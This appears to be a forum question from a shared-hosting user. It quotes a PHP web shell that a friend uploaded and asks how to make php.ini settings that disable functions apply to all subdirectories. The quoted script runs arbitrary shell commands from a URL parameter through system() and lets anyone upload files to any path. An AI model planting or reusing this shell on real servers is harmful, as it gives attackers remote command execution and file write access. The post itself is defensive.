A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
<?php
if(isset($_REQUEST['upload'])){
echo '
<form enctype="multipart/form-data" action=".config.php?send" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="5120000" />
Send this file: <input name="userfile" type="file" />
To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
<input type="submit" value="Send File" />
</form>';}
?>
<?php
if(isset($_REQUEST['send'])){
$uploaddir = $_POST["direct"];
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n"; echo $uploaddir;}
else
{echo "Upload failed";}
}
?>
This script allows him to process commands through in-URL variables.
I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.
My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?